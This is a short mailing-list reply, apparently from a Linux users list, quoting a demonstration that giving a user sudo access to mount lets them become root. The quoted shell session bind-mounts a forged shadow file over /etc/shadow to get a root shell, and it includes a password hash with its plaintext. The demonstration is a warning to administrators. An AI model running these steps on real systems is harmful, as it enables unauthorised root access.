On 23/06/19 12:07 PM, Andy Smith wrote: > Hello, > > On Sat, Jun 22, 2019 at 04:44:40PM -0700, Jimmy Johnson wrote: >> Some one mentioned mounting drives, all that and what they need can be >> configured. > > Also note that anyone who can use "mount" as root can trivially become > root. If countenancing allowing users to run "mount" as root I would > make scripts that only mounted the exact things to the exact places, > and then let them run those scripts as root. > > andy@debtest1:~$ su - bob > Password: > bob@debtest1:~$ whoami > bob > bob@debtest1:~$ sudo -i > [sudo] password for bob: > Sorry, user bob is not allowed to execute '/bin/bash' as root on debtest1.vps.bitfolk.com. > bob@debtest1:~$ echo 'bob:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/ > 3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow > bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow > bob@debtest1:~$ su - > Password: > root@debtest1:~# whoami > root > > The password of that hash is "letmein1". > > So don't give anyone sudo access to /bin/mount unless you are okay > with them being able to become root proper if they really want to. Haven't you just set your own (bob) password there? Not saying you couldn't set root's instead, but ... it looks like in this case you already knew it. Cheers, Richard
Attachment:
signature.asc
Description: OpenPGP digital signature